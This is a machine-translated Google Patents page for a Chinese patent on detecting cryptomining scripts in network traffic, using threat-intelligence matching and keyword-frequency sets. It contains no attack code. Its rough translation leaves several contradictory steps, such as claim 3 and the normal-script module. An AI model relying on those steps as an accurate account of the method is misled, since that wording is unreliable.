CN115801466A - Method and device for detecting ore excavation script based on flow - Google Patents

Method and device for detecting ore excavation script based on flow Download PDF

Info

Publication number
CN115801466A
CN115801466A CN202310080142.2A CN202310080142A CN115801466A CN 115801466 A CN115801466 A CN 115801466A CN 202310080142 A CN202310080142 A CN 202310080142A CN 115801466 A CN115801466 A CN 115801466A
Authority
CN
China
Prior art keywords
script
script file
words
ore
word
Prior art date
Legal status (The legal status is an assumption and is not a legal conclusion. Google has not performed a legal analysis and makes no representation as to the accuracy of the status listed.)
Granted
Application number
CN202310080142.2A
Other languages
Chinese (zh)
Other versions
CN115801466B (en
Inventor
郭静海
张福
程度
Current Assignee (The listed assignees may be inaccurate. Google has not performed a legal analysis and makes no representation or warranty as to the accuracy of the list.)
Beijing Shengxin Network Technology Co ltd
Original Assignee
Beijing Shengxin Network Technology Co ltd
Priority date (The priority date is an assumption and is not a legal conclusion. Google has not performed a legal analysis and makes no representation as to the accuracy of the date listed.)
Filing date
Publication date
Application filed by Beijing Shengxin Network Technology Co ltd filed Critical Beijing Shengxin Network Technology Co ltd
Priority to CN202310080142.2A priority Critical patent/CN115801466B/en
Publication of CN115801466A publication Critical patent/CN115801466A/en
Application granted granted Critical
Publication of CN115801466B publication Critical patent/CN115801466B/en
Active legal-status Critical Current
Anticipated expiration legal-status Critical

Links

Images

Landscapes

  • Information Retrieval, Db Structures And Fs Structures Therefor (AREA)

Abstract

The disclosure relates to a method and a device for detecting an ore excavation script based on flow. The method comprises the following steps: responding to the operation of generating a download script file by the flow data, and matching the threat intelligence data and the flow data to obtain a matching result; under the condition of successful matching, determining a first word matched with the characteristic word set and a second word matched with the special word set in the script file through the mining identification model; determining whether the script file is a mine digging script or not according to the first words and the second words; and generating alarm information under the condition that the script file is the ore excavation script. According to the method and the device, the flow data in the equipment can be matched with threat information data, the characteristic words and the special words in the script file are determined by using the ore excavation identification model, the ore excavation script is identified based on the characteristic words and the special words, real-time detection under large flow can be supported, the detection speed is high, the performance consumption is low, and the detection efficiency and the accuracy of the ore excavation script can be improved.

Description

Method and device for detecting ore excavation script based on flow
Technical Field
The disclosure relates to the technical field of computers, in particular to a method and a device for detecting an ore excavation script based on flow.
Background
With the development of block chain technology, virtual currencies come out at a dispute, and the acquisition modes of the currencies are obtained through a large amount of calculation, so that various mining trojans are brought about at the same time. The mining trojan can steal the operation resources of other equipment, so that the equipment runs at full load, the running speed of the equipment is slowed, and the service life of hardware of the equipment is influenced.
An attacker can utilize a system with a bug to remotely implant an excavation script file into other equipment, wherein the script file can detect the type of an operating system and is used for downloading a corresponding excavation Trojan and a control program, can detect the process of the operating system in order to monopolize system resources and forcibly kill irrelevant processes, and also has the functions of adding a timing task, appointing an external connection domain name, clearing historical records, downloading an environment installation package and the like. The impact on the device itself is large and can cause inconvenience to the actual owner of the device using the device.
Disclosure of Invention
The disclosure provides a method and a device for detecting an ore excavation script based on flow.
According to an aspect of the present disclosure, there is provided a method for detecting a mining script based on a flow rate, including:
responding to the operation of generating a download script file by the flow data, and performing matching processing on preset threat information data and the flow data to obtain a matching result;
under the condition that the matching result is successful, determining a first word matched with a feature word set and a second word matched with a special word set in the script file through an ore mining identification model, wherein the feature word set is a word set with the occurrence frequency of an ore mining script sample being greater than a first threshold value, and the special word set is a word set which appears in the ore mining script sample and does not appear in a normal script sample;
determining whether the script file is a mine digging script or not according to the first words and the second words;
and generating alarm information under the condition that the script file is the mine digging script.
In some embodiments of the present disclosure, the determining, by a mining identification model, a first term in the script file that matches the feature term set includes:
performing word segmentation and denoising processing on the script file to obtain a word set of the script file;
determining undetermined words in the word set, wherein the occurrence frequency of the undetermined words is greater than a second threshold;
determining the first word appearing in the feature word set in the pending words.
In some embodiments of the present disclosure, the determining, by the mining identification model, a second word in the script file that matches the unique word set includes:
performing word segmentation and denoising processing on the script file to obtain a word set of the script file;
in the set of words, the second word appearing in the set of characteristic words is determined.
In some embodiments of the present disclosure, determining whether the script file is a mine excavation script according to the first term and the second term includes:
determining that the script file is a mine excavation script if the total number of the first terms and the second terms is greater than a third threshold.
In some embodiments of the disclosure, the method further comprises:
under the condition that the matching result is successful and the script file is identified as not being the ore mining script, acquiring the special words which appear in the script file and do not appear in a normal script sample, and adding the special words to the special word set;
and generating alarm information.
In some embodiments of the present disclosure, the method further comprises:
determining whether the script file is an ore excavation script or not through the ore excavation identification model under the condition that the matching result is unmatched;
acquiring the IP address and domain name information of the flow data under the condition that the script file is identified as a mine digging script;
updating the threat intelligence data through the IP address and the domain name information;
and generating alarm information.
In some embodiments of the present disclosure, the method further comprises:
and under the condition that the matching result is unmatched and the script file is identified as not the ore mining script, determining the script file as a normal script.
According to another aspect of the present disclosure, there is provided a flow-based ore excavation script detecting apparatus including:
the matching module is used for responding to the operation of generating a download script file by the flow data, and matching the preset threat intelligence data with the flow data to obtain a matching result;
the word determining module is used for determining a first word matched with a feature word set and a second word matched with a peculiar word set in the script file through the mining identification model under the condition that the matching result is successful, wherein the feature word set is a word set with the occurrence frequency of which is greater than a first threshold value in a mining script sample, and the peculiar word set is a word set which appears in the mining script sample and does not appear in a normal script sample;
the recognition module is used for determining whether the script file is a mine digging script or not according to the characteristic words and the special words;
and the alarm module is used for generating alarm information under the condition that the script file is the ore excavation script.
In some embodiments of the disclosure, the term determination module is further to:
performing word segmentation and denoising processing on the script file to obtain a word set of the script file;
determining undetermined words with the occurrence frequency larger than a second threshold value in the word set;
determining the first word appearing in the feature word set among the pending words.
In some embodiments of the disclosure, the term determination module is further to:
performing word segmentation and denoising processing on the script file to obtain a word set of the script file;
in the set of words, the second word appearing in the set of characteristic words is determined.
In some embodiments of the present disclosure, the identification module is further configured to:
determining that the script file is a mine excavation script if the total number of the first terms and the second terms is greater than a third threshold.
In some embodiments of the present disclosure, the apparatus further comprises: a word set update module to:
under the condition that the matching result is successful and the script file is identified as not being the ore mining script, acquiring the special words which appear in the script file and do not appear in a normal script sample, and adding the special words to the special word set;
and generating alarm information.
In some embodiments of the disclosure, the apparatus further comprises a threat intelligence data update module to:
determining whether the script file is an ore excavation script or not through the ore excavation identification model under the condition that the matching result is unmatched;
acquiring the IP address and domain name information of the flow data under the condition that the script file is identified as a mine digging script;
updating the threat intelligence data through the IP address and the domain name information;
and generating alarm information.
In some embodiments of the present disclosure, the apparatus further comprises: and the normal script confirming module is used for determining the script file as the normal script under the condition that the matching result is unmatched and the script file is identified as the ore digging script.
According to another aspect of the present disclosure, there is provided a flow-based ore excavation script detecting apparatus including: a processor; a memory for storing processor-executable instructions; wherein the processor is configured to invoke the memory-stored instructions to perform the above-described method.
According to another aspect of the present disclosure, there is provided a computer readable storage medium having stored thereon computer program instructions which, when executed by a processor, implement the above-described method.
According to the method for detecting the ore excavation script based on the flow, the flow data in equipment can be matched with threat information data, if the matching is successful, the characteristic words and the specific words in the script file are determined by using the ore excavation identification model, the ore excavation script is identified based on two characteristics of the characteristic words and the specific words, the real-time detection under the large flow can be supported, the detection speed is high, the performance consumption is low, and the detection efficiency and the accuracy of the ore excavation script can be improved. In addition, the specific word set, the characteristic word set and the threat information data can be continuously updated in the identification process, the self-learning process is realized, the number of samples required in the learning process is reduced, and the identification accuracy is higher and higher.
It is to be understood that both the foregoing general description and the following detailed description are exemplary and explanatory only and are not restrictive of the disclosure. Other features and aspects of the present disclosure will become more apparent from the following detailed description of exemplary embodiments with reference to the attached drawings.
Drawings
The accompanying drawings, which are incorporated in and constitute a part of this specification, illustrate embodiments consistent with the present disclosure and, together with the description, serve to explain the principles of the disclosure,
FIG. 1 illustrates a flow diagram of a flow-based ore mining script detection method according to an embodiment of the present disclosure;
FIG. 2 illustrates an application diagram of a flow-based ore excavation script detection method according to an embodiment of the present disclosure;
FIG. 3 illustrates a block diagram of a flow-based ore mining script detection apparatus in accordance with an embodiment of the present disclosure;
FIG. 4 illustrates a block diagram of a flow-based ore excavation script detection apparatus, in accordance with an embodiment of the present disclosure;
fig. 5 shows a block diagram of an electronic device in accordance with an embodiment of the disclosure.
Detailed Description
Various exemplary embodiments, features and aspects of the present disclosure will be described in detail below with reference to the accompanying drawings. In the drawings, like reference numbers can indicate functionally identical or similar elements. While the various aspects of the embodiments are presented in drawings, the drawings are not necessarily drawn to scale unless specifically indicated.
The word "exemplary" is used exclusively herein to mean "serving as an example, embodiment, or illustration. Any embodiment described herein as "exemplary" is not necessarily to be construed as preferred or advantageous over other embodiments.
The term "and/or" herein is merely an association describing an associated object, meaning that three relationships may exist, e.g., a and/or B, may mean: a exists alone, A and B exist simultaneously, and B exists alone. In addition, the term "at least one" herein means any one of a variety or any combination of at least two of a variety, for example, including at least one of A, B, C, and may mean including any one or more elements selected from the group consisting of A, B and C.
Furthermore, in the following detailed description, numerous specific details are set forth in order to provide a better understanding of the present disclosure. It will be understood by those skilled in the art that the present disclosure may be practiced without some of these specific details. In some instances, methods, means, elements and circuits that are well known to those skilled in the art have not been described in detail so as not to obscure the present disclosure.
Aiming at the problems in the related technology, the flow data in the equipment can be matched with threat information data, if the matching is successful, the characteristic words and the specific words in the script file are determined by using the ore excavation identification model, and then the ore excavation script is identified based on the two characteristics of the characteristic words and the specific words, so that the real-time detection under the condition of large flow can be supported, the detection speed is high, the performance consumption is low, and the detection efficiency and the accuracy of the ore excavation script can be improved.
Fig. 1 illustrates a flow chart of a method of flow-based ore mining script detection, as illustrated in fig. 1, the method comprising:
step S11, responding to the operation of generating a download script file by the flow data, and matching the preset threat intelligence data with the flow data to obtain a matching result;
step S12, under the condition that the matching result is successful, determining a first word matched with a feature word set and a second word matched with a special word set in the script file through an ore mining identification model, wherein the feature word set is a word set with the occurrence frequency of which is greater than a first threshold value in an ore mining script sample, and the special word set is a word set which appears in the ore mining script sample and does not appear in a normal script sample;
s13, determining whether the script file is a mine digging script or not according to the feature words and the special words;
and S14, generating alarm information under the condition that the script file is the ore digging script.
In some embodiments of the present disclosure, when a device (e.g., an electronic device such as a computer, a mobile phone, etc.) is running, if the device is attacked maliciously, the device may generate traffic data that is accessed by a malicious attacker, for example, the malicious attacker accesses the device through the internet, and remotely downloads a script file, which may be an ore mining script, and after the download execution, the script file may occupy running resources of the device maliciously, which may cause inconvenience for a user of the device and may adversely affect the device.
Fig. 2 illustrates an application diagram of a flow-based ore mining script detection method according to an embodiment of the present disclosure.
In some embodiments of the present disclosure, in step S11, the preset threat intelligence data may record a domain name or IP address known to have a threat, and if the domain name or IP address of the visitor matches the record in the threat intelligence data, the traffic data may be considered to have a safety hazard, and the script file downloaded in the traffic data may be an ore mining script.
In some embodiments of the present disclosure, in step S12, it may be determined whether the script downloaded in the flow data is a mine excavation script by a mine excavation recognition model. In the determination, the feature word set and the unique word set may be used for determination.
In some embodiments of the present disclosure, the feature word set is a word set obtained by counting words appearing in a plurality of ore mining script samples, and the frequency of appearance of the feature words in the word set in the ore mining script samples is high, for example, greater than a first threshold value, so that the feature words can be used as representative words in the ore mining script samples, and if a large number of feature words exist in a certain script file, the probability that the script file is an ore mining script is high.
In some embodiments of the present disclosure, it is not possible to accurately determine whether a certain script file is a mine excavation script only by using the feature words, and the accuracy of the determination may be further improved based on the specific words. In addition to counting the words in the plurality of ore excavation script samples, the words in the normal script samples (non-ore excavation scripts) can be counted, the words which only appear in the ore excavation script samples but not appear in the normal script samples are determined, the words can be used as special words of the ore excavation scripts, the formed set is a special word set, and if a large number of special words which only appear in the ore excavation script samples exist in a certain script file, the probability that the script is the ore excavation script is high. Furthermore, the accuracy of the mining script judgment can be improved by comprehensively using the characteristic word set and the specific word set.
In some embodiments of the present disclosure, in step S12, a first term matching the set of feature words and a second term matching the set of unique words in the script file may be determined. I.e. finding the characteristic words and the unique words in the script file.
In some embodiments of the present disclosure, the determining, by a mining identification model, a first term in the script file that matches the feature term set includes: performing word segmentation and denoising processing on the script file to obtain a word set of the script file; determining undetermined words with the occurrence frequency larger than a second threshold value in the word set; determining the first word appearing in the feature word set among the pending words.
In some embodiments of the present disclosure, the word segmentation and denoising process may be performed using an algorithm in the related art, for example, a word segmentation algorithm such as a word segmentation, and the present disclosure does not limit the specific manner of the word segmentation and denoising process. After processing, a set of words for the script file may be obtained.
In some embodiments of the present disclosure, the pending word with the occurrence frequency greater than a second threshold may be determined in the word set, and the second threshold may be the same as or different from the first threshold, which is not limited by the present disclosure.
In some embodiments of the present disclosure, a first word appearing in the feature word set may be determined in the pending word, that is, an intersection of the pending word and the feature word set is determined, and a word in the intersection is the first word.
In some embodiments of the present disclosure, the determining, by the mining identification model, a second word in the script file that matches the unique word set includes: performing word segmentation and denoising processing on the script file to obtain a word set of the script file; in the set of words, the second word appearing in the set of characteristic words is determined.
In some embodiments of the present disclosure, the word segmentation and denoising processes are as described above and will not be described herein. Alternatively, the above set of words may be used directly.
In some embodiments of the present disclosure, a second word appearing in the unique word set may be determined in the word set, that is, an intersection of the unique word set and the word set is determined, and the word in the intersection is the second word.
In some embodiments of the present disclosure, in step S13, whether the script file is a mine excavation script may be comprehensively determined based on the first term and the second term, thereby improving the determination accuracy. In an example, a total number of the first terms and the second terms may be solved, and in the event that the total number is greater than a third threshold, the script file is determined to be a mine excavation script.
In some embodiments of the present disclosure, in step S14, if it is determined that the script file is a mining script, an alarm message may be generated, thereby prompting the equipment or the equipment user to take measures. For example, the script file is isolated or deleted, etc., so as to avoid executing the script file, and prevent the device from being attacked by malicious attacks.
In some embodiments of the present disclosure, family identification may also be performed on the script file before generating the alarm information, for example, information identifying a category family of the mining script to which the script file belongs. The present disclosure is not limited to a particular manner of family identification.
In some embodiments of the disclosure, the method further comprises: under the condition that the matching result is successful and the script file is identified as not a mine digging script, acquiring a special word which appears in the script file and does not appear in a normal script sample, and adding the special word to the special word set; and generating alarm information. That is, the flow data is matched with the threat information data, but if the ore mining identification model judges that the script file is the ore mining script, the script file can be automatically classified into the ore mining script, the specific words in the ore mining script can be counted and added to the specific word set, and therefore the accuracy of judgment by using the specific word set is improved. Furthermore, the characteristic words in the mining script can be counted, and a characteristic word set is added, so that the accuracy of judgment by using the characteristic word set is further improved. Further, the script file can be subjected to family identification, alarm information generation and the like.
By the method, the ore excavation identification model can be automatically learned, and when the script file is determined to be the ore excavation script but is not successfully identified by the ore excavation identification model, the specific word set and the characteristic word set can be automatically updated based on the words in the script file, so that the accuracy of judgment by using the ore excavation identification model in the subsequent process is improved.
In some embodiments of the present disclosure, the method further comprises: determining whether the script file is an ore excavation script or not through the ore excavation identification model under the condition that the matching result is unmatched; acquiring the IP address and domain name information of the flow data under the condition that the script file is identified as a mine digging script; updating the threat intelligence data through the IP address and the domain name information; and generating alarm information.
In some embodiments of the disclosure, if the traffic data does not match the threat intelligence data, i.e., the traffic data is not from a known threatening domain name or IP address, but the mining identification model identifies the script file as a mining script, it may be determined that the script file is a mining script, and the unknown domain name or IP address of the device is accessed, since there is malicious access behavior to the device (i.e., behavior that causes the device to download the mining script), the domain name information or IP address may be added to the threat intelligence data as a known threatening IP address or domain name, which may then be directly determined as malicious access if the IP address or domain name continues to access the device during subsequent use of the device. Further, family identification can be performed on the ore excavation script and alarm information can be generated.
By the method, threat information data can be automatically updated under the condition that the mining script comes from unknown domain names or IP addresses, so that the threat information data are enriched, and the equipment detection range is improved.
In some embodiments of the disclosure, the method further comprises: and under the condition that the matching result is unmatched and the script file is identified as not the ore mining script, determining the script file as a normal script. That is, the traffic data is not from the IP address or domain name with threat, and the mining identification model determines that the script file is not a mining script but a normal script, the processing of the script can be normally executed without isolation or deletion, thereby minimizing the influence on normal access behavior.
According to the method for detecting the mining script based on the flow, the flow data in equipment can be matched with threat information data, if the matching is successful, the characteristic words and the specific words in the script file are determined by using the mining identification model, and then the mining script is identified based on two characteristics of the characteristic words and the specific words, so that the real-time detection under the large flow can be supported, the detection speed is high, the performance consumption is low, and the detection efficiency and the accuracy of the mining script can be improved. In addition, the specific word set, the characteristic word set and the threat information data can be continuously updated in the identification process, the self-learning process is realized, the number of samples required in the learning process is reduced, and the identification accuracy is higher and higher.
Fig. 3 illustrates a block diagram of a flow-based ore mining script detection apparatus, as shown in fig. 3, comprising:
the matching module 11 is used for responding to the operation of generating a downloading script file by the flow data, and performing matching processing on preset threat information data and the flow data to obtain a matching result;
the word determining module 12 is configured to determine, by using the mining identification model, a first word matched with the feature word set and a second word matched with the unique word set in the script file when the matching result is that the matching is successful, where the feature word set is a word set whose occurrence frequency in the mining script sample is greater than a first threshold, and the unique word set is a word set which occurs in the mining script sample and does not occur in the normal script sample;
the recognition module 13 is configured to determine whether the script file is a mine excavation script according to the feature words and the specific words;
and the alarm module 14 is used for generating alarm information under the condition that the script file is the ore excavation script.
In some embodiments of the disclosure, the term determination module is further to:
performing word segmentation and denoising processing on the script file to obtain a word set of the script file;
determining undetermined words with the occurrence frequency larger than a second threshold value in the word set;
determining the first word appearing in the feature word set among the pending words.
In some embodiments of the disclosure, the term determination module is further to:
performing word segmentation and denoising processing on the script file to obtain a word set of the script file;
in the set of words, the second word appearing in the set of characteristic words is determined.
In some embodiments of the present disclosure, the identification module is further configured to:
determining that the script file is a mine excavation script if the total number of the first terms and the second terms is greater than a third threshold.
In some embodiments of the present disclosure, the apparatus further comprises: a word set update module to:
under the condition that the matching result is successful and the script file is identified as not being the ore mining script, acquiring the special words which appear in the script file and do not appear in a normal script sample, and adding the special words to the special word set;
and generating alarm information.
In some embodiments of the disclosure, the apparatus further comprises a threat intelligence data update module to:
determining whether the script file is an ore excavation script or not through the ore excavation identification model under the condition that the matching result is unmatched;
acquiring the IP address and domain name information of the flow data under the condition that the script file is identified as a mine digging script;
updating the threat intelligence data through the IP address and the domain name information;
and generating alarm information.
In some embodiments of the present disclosure, the apparatus further comprises: and the normal script confirming module is used for determining the script file as the normal script under the condition that the matching result is unmatched and the script file is identified as the ore digging script.
In some embodiments, functions of or modules included in the apparatus provided in the embodiments of the present disclosure may be used to execute the method described in the above method embodiments, and specific implementation thereof may refer to the description of the above method embodiments, and for brevity, will not be described again here.
Embodiments of the present disclosure also provide a computer-readable storage medium having stored thereon computer program instructions, which when executed by a processor, implement the above-mentioned method. The computer readable storage medium may be a non-volatile computer readable storage medium.
An embodiment of the present disclosure further provides an electronic device, including: a processor; a memory for storing processor-executable instructions; wherein the processor is configured to invoke the memory-stored instructions to perform the above-described method.
The disclosed embodiments also provide a computer program product including computer readable code, and when the computer readable code runs on a device, a processor in the device executes instructions for implementing the cloud application management method provided in any of the above embodiments.
The embodiments of the present disclosure also provide another computer program product for storing computer readable instructions, where the instructions, when executed, cause a computer to perform the operations of the cloud application management method provided in any of the above embodiments.
The electronic device may be provided as a terminal, server, or other form of device.
FIG. 4 illustrates a block diagram of a flow-based ore excavation script detection apparatus 800 according to an embodiment of the present disclosure. For example, the device 800 may be a mobile phone, a computer, a digital broadcast terminal, a messaging device, a game console, a tablet device, a medical device, an exercise device, a personal digital assistant, and the like.
Referring to fig. 4, device 800 may include one or more of the following components: a processing component 802, a memory 804, a power component 806, a multimedia component 808, an audio component 810, an input/output interface 812, a sensor component 814, and a communication component 816.
The processing component 802 generally controls overall operation of the device 800, such as operations associated with display, telephone calls, data communications, camera operations, and recording operations. The processing component 802 may include one or more processors 820 to execute instructions to perform all or a portion of the steps of the methods described above. Further, the processing component 802 can include one or more modules that facilitate interaction between the processing component 802 and other components. For example, the processing component 802 can include a multimedia module to facilitate interaction between the multimedia component 808 and the processing component 802.
The memory 804 is configured to store various types of data to support operation at the device 800. Examples of such data include instructions for any application or method operating on device 800, contact data, phonebook data, messages, pictures, videos, and so forth. The memory 804 may be implemented by any type or combination of volatile or non-volatile memory devices, such as Static Random Access Memory (SRAM), electrically erasable programmable read-only memory (EEPROM), erasable programmable read-only memory (EPROM), programmable read-only memory (PROM), read-only memory (ROM), magnetic memory, flash memory, magnetic or optical disks.
The power component 806 provides power to the various components of the device 800. The power components 806 may include a power management system, one or more power supplies, and other components associated with generating, managing, and distributing power for the device 800.
The multimedia component 808 includes a screen that provides an output interface between the device 800 and a user. In some embodiments, the screen may include a Liquid Crystal Display (LCD) and a Touch Panel (TP). If the screen includes a touch panel, the screen may be implemented as a touch screen to receive an input signal from a user. The touch panel includes one or more touch sensors to sense touch, slide, and gestures on the touch panel. The touch sensor may not only sense an edge of a touch or slide action, but also detect a duration and pressure associated with the touch or slide operation. In some embodiments, the multimedia component 808 includes a front facing camera and/or a rear facing camera. The front-facing camera and/or the rear-facing camera may receive external multimedia data when the device 800 is in an operating mode, such as a shooting mode or a video mode. Each front camera and rear camera may be a fixed optical lens system or have a focal length and optical zoom capability.
The audio component 810 is configured to output and/or input audio signals. For example, the audio component 810 includes a Microphone (MIC) configured to receive external audio signals when the device 800 is in an operational mode, such as a call mode, a recording mode, and a voice recognition mode. The received audio signals may further be stored in the memory 804 or transmitted via the communication component 816. In some embodiments, audio component 810 also includes a speaker for outputting audio signals.
The input/output interface 812 provides an interface between the processing component 802 and peripheral interface modules, which may be keyboards, click wheels, buttons, etc. These buttons may include, but are not limited to: a home button, a volume button, a start button, and a lock button.
The sensor assembly 814 includes one or more sensors for providing various aspects of state assessment for the device 800. For example, the sensor assembly 814 may detect the open/closed state of the device 800, the relative positioning of components, such as a display and keypad of the device 800, the sensor assembly 814 may also detect a change in the position of the device 800 or components within the device 800, the presence or absence of user contact with the device 800, orientation or acceleration/deceleration of the device 800, and a change in the temperature of the device 800. Sensor assembly 814 may include a proximity sensor configured to detect the presence of a nearby object without any physical contact. The sensor assembly 814 may also include a light sensor, such as a CMOS or CCD image sensor, for use in imaging applications. In some embodiments, the sensor assembly 814 may also include an acceleration sensor, a gyroscope sensor, a magnetic sensor, a pressure sensor, or a temperature sensor.
Communications component 816 is configured to facilitate communications between device 800 and other devices in a wired or wireless manner. The device 800 may access a wireless network based on a communication standard, such as WiFi,2G or 3G, or a combination thereof. In an exemplary embodiment, the communication component 816 receives a broadcast signal or broadcast related information from an external broadcast management system via a broadcast channel. In an exemplary embodiment, the communication component 816 further includes a Near Field Communication (NFC) module to facilitate short-range communications. For example, the NFC module may be implemented based on Radio Frequency Identification (RFID) technology, infrared data association (IrDA) technology, ultra Wideband (UWB) technology, bluetooth (BT) technology, and other technologies.
In an exemplary embodiment, the device 800 may be implemented by one or more Application Specific Integrated Circuits (ASICs), digital Signal Processors (DSPs), digital Signal Processing Devices (DSPDs), programmable Logic Devices (PLDs), field Programmable Gate Arrays (FPGAs), controllers, micro-controllers, microprocessors or other electronic components for performing the above-described methods.
In an exemplary embodiment, a non-transitory computer-readable storage medium, such as the memory 804, is also provided that includes computer program instructions executable by the processor 820 of the device 800 to perform the above-described methods.
Fig. 5 illustrates a block diagram of an electronic device 1900 in accordance with an embodiment of the disclosure. For example, the electronic device 1900 may be provided as a server. Referring to fig. 5, electronic device 1900 includes a processing unit 1922, which further includes one or more processors and memory resources, represented by storage unit 1932, for storing instructions, e.g., applications, that are executable by processing unit 1922. The application programs stored in the storage unit 1932 may include one or more modules each corresponding to a set of instructions. Further, processing unit 1922 is configured to execute instructions to perform the above-described method.
The electronic device 1900 may further include a power module 1926 configured to perform power management of the electronic device 1900, a wired or wireless network interface 1950 configured to connect the electronic device 1900 to a network, and an I/O interface 1958. The electronic device 1900 may operate based on an operating system, such as Windows Server, stored in memory 1932 TM ,Mac OS X TM ,Unix TM ,Linux TM ,FreeBSD TM Or the like.
In an exemplary embodiment, a non-volatile computer-readable storage medium, such as the storage unit 1932, is also provided that includes computer program instructions that are executable by the processing unit 1922 of the electronic device 1900 to perform the above-described method.
The present disclosure may be systems, methods, and/or computer program products. The computer program product may include a computer-readable storage medium having computer-readable program instructions embodied thereon for causing a processor to implement various aspects of the present disclosure.
The computer readable storage medium may be a tangible device that can hold and store the instructions for use by the instruction execution device. The computer readable storage medium may be, for example, but not limited to, an electronic memory device, a magnetic memory device, an optical memory device, an electromagnetic memory device, a semiconductor memory device, or any suitable combination of the foregoing. More specific examples (a non-exhaustive list) of the computer readable storage medium would include the following: a portable computer diskette, a hard disk, a Random Access Memory (RAM), a read-only memory (ROM), an erasable programmable read-only memory (EPROM or flash memory), a Static Random Access Memory (SRAM), a portable compact disc read-only memory (CD-ROM), a Digital Versatile Disc (DVD), a memory stick, a floppy disk, a mechanical coding device, such as a punch card or an in-groove protruding structure with instructions stored thereon, and any suitable combination of the foregoing. Computer-readable storage media as used herein is not to be construed as transitory signals per se, such as radio waves or other freely propagating electromagnetic waves, electromagnetic waves propagating through a waveguide or other transmission medium (e.g., optical pulses through a fiber optic cable), or electrical signals transmitted through electrical wires.
The computer-readable program instructions described herein may be downloaded from a computer-readable storage medium to a respective computing/processing device, or to an external computer or external storage device via a network, such as the internet, a local area network, a wide area network, and/or a wireless network. The network may include copper transmission cables, fiber optic transmission, wireless transmission, routers, firewalls, switches, gateway computers and/or edge servers. The network adapter card or network interface in each computing/processing device receives the computer-readable program instructions from the network and forwards the computer-readable program instructions for storage in a computer-readable storage medium in the respective computing/processing device.
The computer program instructions for carrying out operations of the present disclosure may be assembler instructions, instruction Set Architecture (ISA) instructions, machine-related instructions, microcode, firmware instructions, state setting data, or source or object code written in any combination of one or more programming languages, including an object oriented programming language such as Smalltalk, C + + or the like and conventional procedural programming languages, such as the "C" programming language or similar programming languages. The computer-readable program instructions may execute entirely on the user's computer, partly on the user's computer, as a stand-alone software package, partly on the user's computer and partly on a remote computer or entirely on the remote computer or server. In the case of a remote computer, the remote computer may be connected to the user's computer through any type of network, including a Local Area Network (LAN) or a Wide Area Network (WAN), or the connection may be made to an external computer (for example, through the Internet using an Internet service provider). In some embodiments, the electronic circuitry that can execute the computer-readable program instructions implements aspects of the present disclosure by utilizing the state information of the computer-readable program instructions to personalize the electronic circuitry, such as a programmable logic circuit, a Field Programmable Gate Array (FPGA), or a Programmable Logic Array (PLA).
Various aspects of the present disclosure are described herein with reference to flowchart illustrations and/or block diagrams of methods, apparatus (systems) and computer program products according to embodiments of the disclosure. It will be understood that each block of the flowchart illustrations and/or block diagrams, and combinations of blocks in the flowchart illustrations and/or block diagrams, can be implemented by computer-readable program instructions.
These computer-readable program instructions may be provided to a processor of a general purpose computer, special purpose computer, or other programmable data processing apparatus to produce a machine, such that the instructions, which execute via the processor of the computer or other programmable data processing apparatus, create means for implementing the functions/acts specified in the flowchart and/or block diagram block or blocks. These computer-readable program instructions may also be stored in a computer-readable storage medium that can direct a computer, programmable data processing apparatus, and/or other devices to function in a particular manner, such that the computer-readable medium storing the instructions comprises an article of manufacture including instructions which implement the function/act specified in the flowchart and/or block diagram block or blocks.
The computer readable program instructions may also be loaded onto a computer, other programmable data processing apparatus, or other devices to cause a series of operational steps to be performed on the computer, other programmable apparatus or other devices to produce a computer implemented process such that the instructions which execute on the computer, other programmable apparatus or other devices implement the functions/acts specified in the flowchart and/or block diagram block or blocks.
The flowchart and block diagrams in the figures illustrate the architecture, functionality, and operation of possible implementations of systems, methods and computer program products according to various embodiments of the present disclosure. In this regard, each block in the flowchart or block diagrams may represent a module, segment, or portion of instructions, which comprises one or more executable instructions for implementing the specified logical function(s). In some alternative implementations, the functions noted in the block may occur out of the order noted in the figures. For example, two blocks shown in succession may, in fact, be executed substantially concurrently, or the blocks may sometimes be executed in the reverse order, depending upon the functionality involved. It will also be noted that each block of the block diagrams and/or flowchart illustration, and combinations of blocks in the block diagrams and/or flowchart illustration, can be implemented by special purpose hardware-based systems which perform the specified functions or acts, or combinations of special purpose hardware and computer instructions.
The computer program product may be embodied in hardware, software or a combination thereof. In an alternative embodiment, the computer program product is embodied in a computer storage medium, and in another alternative embodiment, the computer program product is embodied in a Software product, such as a Software Development Kit (SDK), or the like.
Having described embodiments of the present disclosure, the foregoing description is intended to be exemplary, not exhaustive, and not limited to the disclosed embodiments. Many modifications and variations will be apparent to those of ordinary skill in the art without departing from the scope and spirit of the described embodiments. The terminology used herein is chosen in order to best explain the principles of the embodiments, the practical application, or improvements made to the technology in the marketplace, or to enable others of ordinary skill in the art to understand the embodiments disclosed herein.

Claims (10)

1. A method for detecting an ore excavation script based on flow is characterized by comprising the following steps:
responding to the operation of generating a download script file by the flow data, and performing matching processing on preset threat information data and the flow data to obtain a matching result;
under the condition that the matching result is successful, determining a first word matched with a feature word set and a second word matched with a special word set in the script file through an ore mining identification model, wherein the feature word set is a word set with the occurrence frequency of an ore mining script sample being greater than a first threshold value, and the special word set is a word set which appears in the ore mining script sample and does not appear in a normal script sample;
determining whether the script file is a mine digging script or not according to the first words and the second words;
and generating alarm information under the condition that the script file is the ore excavation script.
2. The method according to claim 1, wherein determining the first term in the script file that matches the feature term set via an ore mining recognition model comprises:
performing word segmentation and denoising processing on the script file to obtain a word set of the script file;
determining undetermined words with the occurrence frequency larger than a second threshold value in the word set;
determining the first word appearing in the feature word set among the pending words.
3. The flow-based ore cutting script detection method of claim 1, wherein the determining of the second words in the script file matching the unique set of words via an ore cutting recognition model comprises:
performing word segmentation and denoising processing on the script file to obtain a word set of the script file;
in the set of words, the second word appearing in the set of characteristic words is determined.
4. The flow-based ore mining script detection method of claim 1, wherein determining whether the script file is an ore mining script according to the first term and the second term comprises:
determining that the script file is a mine excavation script if the total number of the first terms and the second terms is greater than a third threshold.
5. The flow-based mining script detection method of claim 1, further comprising:
under the condition that the matching result is successful and the script file is identified as not being the ore mining script, acquiring the special words which appear in the script file and do not appear in a normal script sample, and adding the special words to the special word set;
and generating alarm information.
6. The flow-based ore mining script detection method of claim 1, further comprising:
determining whether the script file is an ore excavation script or not through the ore excavation identification model under the condition that the matching result is unmatched;
acquiring the IP address and domain name information of the flow data under the condition that the script file is identified as a mine digging script;
updating the threat intelligence data through the IP address and the domain name information;
and generating alarm information.
7. The flow-based ore mining script detection method of claim 6, further comprising:
and under the condition that the matching result is unmatched and the script file is identified as not the ore mining script, determining the script file as a normal script.
